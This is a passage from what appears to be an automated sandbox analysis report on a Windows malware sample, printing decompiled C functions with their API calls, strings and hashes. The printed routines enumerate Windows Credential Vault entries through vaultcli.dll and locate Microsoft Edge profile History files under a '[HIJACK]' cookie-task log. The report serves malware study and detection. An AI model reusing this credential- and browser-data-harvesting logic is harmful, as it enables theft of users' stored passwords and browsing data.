0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t83 = _t83 + 1;
				} while (_t83 < 0x100);
				_t43 = 0x104060e4;
				_t84 = 0x1c0;
				do {
					_t71 =  *(_t43 - 4);
					_t43 = _t43 + 0x10;
					 *(_t43 + 0x3ec) = _t71 >> 0x00000008 ^  *(0x104060e0 + (_t71 & 0x000000ff) * 4);
					 *(_t43 + 0x3f0) =  *(_t43 - 0x10) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 0x10) & 0x000000ff) * 4);
					 *(_t43 + 0x3f4) =  *(_t43 - 0xc) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 0xc) & 0x000000ff) * 4);
					_t84 = _t84 - 1;
					_t98 = _t84;
					 *(_t43 + 0x3f8) =  *(_t43 - 8) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 8) & 0x000000ff) * 4);
				} while (_t84 != 0);
				 *0x104060c8 = 0x100418d0;
				 *0x104080e0 = 0x100418d0;
				 *0x104060c4 = 0x10041980;
				_t45 = E10041810(0x10041980, _t98);
				if(_t45 == 0) {
					 *0x104080e0 = 0x10041980;
				}
				return _t45;
			}









                                                  0x10040780
                                                  0x10040782
                                                  0x10040808
                                                  0x1004080f
                                                  0x10040812
                                                  0x1004081e
                                                  0x10040823
                                                  0x10040830
                                                  0x10040830
                                                  0x10040845
                                                  0x10040848
                                                  0x10040863
                                                  0x1004087e
                                                  0x10040899
                                                  0x10040899
                                                  0x1004089c
                                                  0x1004089c
                                                  0x100408ae
                                                  0x100408b3
                                                  0x100408b8
                                                  0x100408be
                                                  0x100408c5
                                                  0x100408c7
                                                  0x100408c7
                                                  0x100408ce

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfe65363f9349887f810c415ac2fe774161be5ce2c0a43524af5390adaf27aaf
                                                  • Instruction ID: 353d1ebc3ce3fcbee98acb398c1f881b97e90d4684741fc405acce2987836237
                                                  • Opcode Fuzzy Hash: dfe65363f9349887f810c415ac2fe774161be5ce2c0a43524af5390adaf27aaf
                                                  • Instruction Fuzzy Hash: E1315037AA09264BD70CCB28DDB3BBD2290E748245F59517DE94BDB3D1DE6CD810C648
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1014AD70, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 71libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E1014AD70() {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = 0;
				if((E10015630() & 0x000000ff) != 0) {
					 *0x10404ec0 = LoadLibraryA("vaultcli.dll");
					if( *0x10404ec0 != 0) {
						 *0x104027e0 = GetProcAddress( *0x10404ec0, "VaultEnumerateItems");
						 *0x104027dc = GetProcAddress( *0x10404ec0, "VaultEnumerateVaults");
						 *0x104027e4 = GetProcAddress( *0x10404ec0, "VaultFree");
						 *0x104027d4 = GetProcAddress( *0x10404ec0, "VaultGetItem");
						 *0x104027e8 = GetProcAddress( *0x10404ec0, "VaultGetItem");
						 *0x104026cc = GetProcAddress( *0x10404ec0, "VaultOpenVault");
						 *0x104027d8 = GetProcAddress( *0x10404ec0, "VaultCloseVault");
						if( *0x104027dc == 0 ||  *0x104027e4 == 0 ||  *0x104027d4 == 0 ||  *0x104027e8 == 0 ||  *0x104026cc == 0 ||  *0x104027d8 == 0 ||  *0x104027e0 == 0) {
							_v12 = 0;
						} else {
							_v12 = 1;
						}
						_v8 = _v12;
					}
				}
				return _v8;
			}





                                                  0x1014ad76
                                                  0x1014ad87
                                                  0x1014ad98
                                                  0x1014ada4
                                                  0x1014adbc
                                                  0x1014add3
                                                  0x1014ade9
                                                  0x1014ae00
                                                  0x1014ae17
                                                  0x1014ae2d
                                                  0x1014ae44
                                                  0x1014ae50
                                                  0x1014ae91
                                                  0x1014ae88
                                                  0x1014ae88
                                                  0x1014ae88
                                                  0x1014ae9b
                                                  0x1014ae9b
                                                  0x1014ada4
                                                  0x1014aea4

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 1014AD92
                                                  • GetProcAddress.KERNEL32(?,VaultEnumerateItems), ref: 1014ADB6
                                                  • GetProcAddress.KERNEL32(?,VaultEnumerateVaults), ref: 1014ADCD
                                                  • GetProcAddress.KERNEL32(?,VaultFree), ref: 1014ADE3
                                                  • GetProcAddress.KERNEL32(?,VaultGetItem), ref: 1014ADFA
                                                  • GetProcAddress.KERNEL32(?,VaultGetItem), ref: 1014AE11
                                                  • GetProcAddress.KERNEL32(?,VaultOpenVault), ref: 1014AE27
                                                  • GetProcAddress.KERNEL32(?,VaultCloseVault), ref: 1014AE3E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                  • API String ID: 2238633743-199985861
                                                  • Opcode ID: 04c8f7b1f920361f73c8600285ca18369f527aa4b87e92dd90dbb53c946938b0
                                                  • Instruction ID: 37a01f38fbc4ed67a538195389684c368b73a59073f24cea7f16aa85d4c85e37
                                                  • Opcode Fuzzy Hash: 04c8f7b1f920361f73c8600285ca18369f527aa4b87e92dd90dbb53c946938b0
                                                  • Instruction Fuzzy Hash: BA31F8B9911220DBD741DFA0CFC87E977B5F748302F64022AE805A72B8D77AD881CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1014B760, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E1014B760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				char _v308;
				char _v336;
				char _v340;
				char _v356;
				char _v360;
				intOrPtr _v364;
				int _t46;
				void* _t53;
				void* _t55;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t93 = __esi;
				_t92 = __edi;
				_t68 = __ebx;
				 *[fs:0x0] = _t94;
				_v340 = 0;
				E10019800( &_v336);
				_v8 = 0;
				_v280 = 0;
				E10025A10(__edi,  &_v279, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v280, 0x1c, 0,  *[fs:0x0], 0x1016c0cf, 0xffffffff);
				E10025E1D( &_v280,  &_v280, 0x104, "\\Microsoft\\Edge\\User Data");
				_t97 = _t94 - 0x15c + 0x18;
				_t46 = PathFileExistsA( &_v280);
				_t100 = _t46;
				if(_t46 != 0) {
					E10014BD0( &_v356, _t100);
					_v8 = 1;
					E10147900(__ebx, _t92, __esi,  &_v280,  &_v356, "History");
					_t98 = _t97 + 0xc;
					if(E10014180( &_v356) > 0) {
						_v360 = 0;
						while(1) {
							_t53 = E10014180( &_v356);
							_t102 = _v360 - _t53;
							if(_v360 >= _t53) {
								break;
							}
							_t55 = E100022D0(E100141C0( &_v356, _t102, _v360), "System Profile");
							_t98 = _t98 + 8;
							if(_t55 == 0) {
								E100023C0( &_v308, 0x101ce0f6);
								E10002400(_t68,  &_v308, _t92, _t93, __eflags, "MSEDGE");
								E100023C0( &_v336, 0x101ce0f7);
								E10002400(_t68,  &_v336, _t92, _t93, __eflags, E100141C0( &_v356, __eflags, _v360));
								E10014C00(_a4, _v360, __eflags,  &_v336);
								_push(E100141C0( &_v356, __eflags, _v360));
								_push(0x1d4);
								_push("MsEdgeUserPath_20200617");
								E10145200(_t92, "[HIJACK][%s][%s][%d]: strChromeUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
								_t98 = _t98 + 0x14;
							}
							_v360 = _v360 + 1;
						}
						_v340 = 1;
					}
					_v8 = 0;
					E100014A0( &_v356);
				}
				_v364 = _v340;
				_v8 = 0xffffffff;
				E10014BB0( &_v336);
				 *[fs:0x0] = _v16;
				return _v364;
			}



















                                                  0x1014b760
                                                  0x1014b760
                                                  0x1014b760
                                                  0x1014b771
                                                  0x1014b77e
                                                  0x1014b78e
                                                  0x1014b793
                                                  0x1014b79a
                                                  0x1014b7af
                                                  0x1014b7c4
                                                  0x1014b7db
                                                  0x1014b7e0
                                                  0x1014b7ea
                                                  0x1014b7f0
                                                  0x1014b7f2
                                                  0x1014b7fe
                                                  0x1014b803
                                                  0x1014b81a
                                                  0x1014b81f
                                                  0x1014b82f
                                                  0x1014b835
                                                  0x1014b850
                                                  0x1014b856
                                                  0x1014b85b
                                                  0x1014b861
                                                  0x00000000
                                                  0x00000000
                                                  0x1014b87f
                                                  0x1014b884
                                                  0x1014b889
                                                  0x1014b898
                                                  0x1014b8a8
                                                  0x1014b8b8
                                                  0x1014b8d6
                                                  0x1014b8e5
                                                  0x1014b8fc
                                                  0x1014b8fd
                                                  0x1014b902
                                                  0x1014b918
                                                  0x1014b91d
                                                  0x1014b91d
                                                  0x1014b84a
                                                  0x1014b84a
                                                  0x1014b925
                                                  0x1014b925
                                                  0x1014b92f
                                                  0x1014b939
                                                  0x1014b939
                                                  0x1014b944
                                                  0x1014b94a
                                                  0x1014b957
                                                  0x1014b965
                                                  0x1014b96f

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B7AF
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1014B7C4
                                                  • _strcat_s.LIBCMT ref: 1014B7DB
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014B7EA
                                                    • Part of subcall function 10147900: PathFileExistsA.SHLWAPI(?), ref: 1014790D
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,MsEdgeUserPath_20200617,000001D4,00000000,00000000,?,00000000,00000000,101CE0F7,MSEDGE,101CE0F6,?,System Profile), ref: 1014B90C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File$Exists$FindFolderNameSpecial_memset_strcat_s
                                                  • String ID: .\task_cookie\default_browser.cpp$History$MSEDGE$MsEdgeUserPath_20200617$System Profile$[HIJACK][%s][%s][%d]: strChromeUserPath = %s$\Microsoft\Edge\User Data
                                                  • API String ID: 2377150101-2008089585
                                                  • Opcode ID: f716c15180a23ca9f3378336792c2039d138575f56e5ef3248a6f4efe9ee1632
                                                  • Instruction ID: 39c4aab5d6bfb16195acb7206771083e9d7335fade4270aad328213cfeb06f3a
                                                  • Opcode Fuzzy Hash: f716c15180a23ca9f3378336792c2039d138575f56e5ef3248a6f4efe9ee1632
                                                  • Instruction Fuzzy Hash: D0416CB5800218ABDB24DB50DD92BDEB778FB15704F1001D8F509A62A1EB756FC4CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000EDB0, Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 384COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E1000EDB0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _t100;
				intOrPtr* _t101;
				char* _t104;
				intOrPtr* _t111;
				intOrPtr* _t115;
				char* _t120;
				intOrPtr* _t123;
				intOrPtr* _t132;
				intOrPtr* _t135;
				intOrPtr* _t147;
				char* _t154;
				intOrPtr* _t157;
				intOrPtr* _t166;
				intOrPtr* _t169;
				intOrPtr* _t182;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr _t288;
				void* _t289;
				void* _t291;
				void* _t296;
				void* _t300;
				void* _t302;
				void* _t319;
				void* _t321;

				_push(0xffffffff);
				_push(0x10170d38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t288;
				_t289 = _t288 - 0x50;
				_v96 = __ecx;
				if(E1000F990(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E10001320( &_v92, "map/set<T> too long");
					_v8 = 0;
					E100011E0( &_v64,  &_v92);
					E10028911( &_v64, 0x1027f2d8);
					_v8 = 0xffffffff;
					E10001360( &_v92);
				}
				_v20 = E1000FC50(_v96,  *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t100 = E1000E900(_a12);
						_t289 = _t289 + 4;
						 *_t100 = _v20;
						_t101 = E1000F480(_v96);
						__eflags = _a12 -  *_t101;
						if(_a12 ==  *_t101) {
							 *((intOrPtr*)(E1000F480(_v96))) = _v20;
						}
					} else {
						_t185 = E1000E8E0(_a12);
						_t289 = _t289 + 4;
						 *_t185 = _v20;
						_t186 = E1000F2B0(_v96);
						__eflags = _a12 -  *_t186;
						if(_a12 ==  *_t186) {
							 *((intOrPtr*)(E1000F2B0(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E1000F4A0(_v96))) = _v20;
					 *((intOrPtr*)(E1000F2B0(_v96))) = _v20;
					 *((intOrPtr*)(E1000F480(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t104 = E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24))));
					_t291 = _t289 + 8;
					if( *_t104 != 0) {
						break;
					}
					_t111 = E1000E8F0(_v24);
					_t115 = E1000E8E0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))));
					_t296 = _t291 + 0x10;
					if( *_t111 !=  *_t115) {
						_a12 =  *((intOrPtr*)(E1000E8E0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))))));
						_t120 = E1000E8A0(_a12);
						_t300 = _t296 + 0x10;
						__eflags =  *_t120;
						if( *_t120 != 0) {
							_t123 = E1000E8E0( *((intOrPtr*)(E1000E8F0(_v24))));
							_t302 = _t300 + 8;
							__eflags = _v24 -  *_t123;
							if(_v24 ==  *_t123) {
								_t135 = E1000E8F0(_v24);
								_t302 = _t302 + 4;
								_v24 =  *_t135;
								E1000F4C0(_v96, __eflags, _v24);
							}
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
							_t132 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
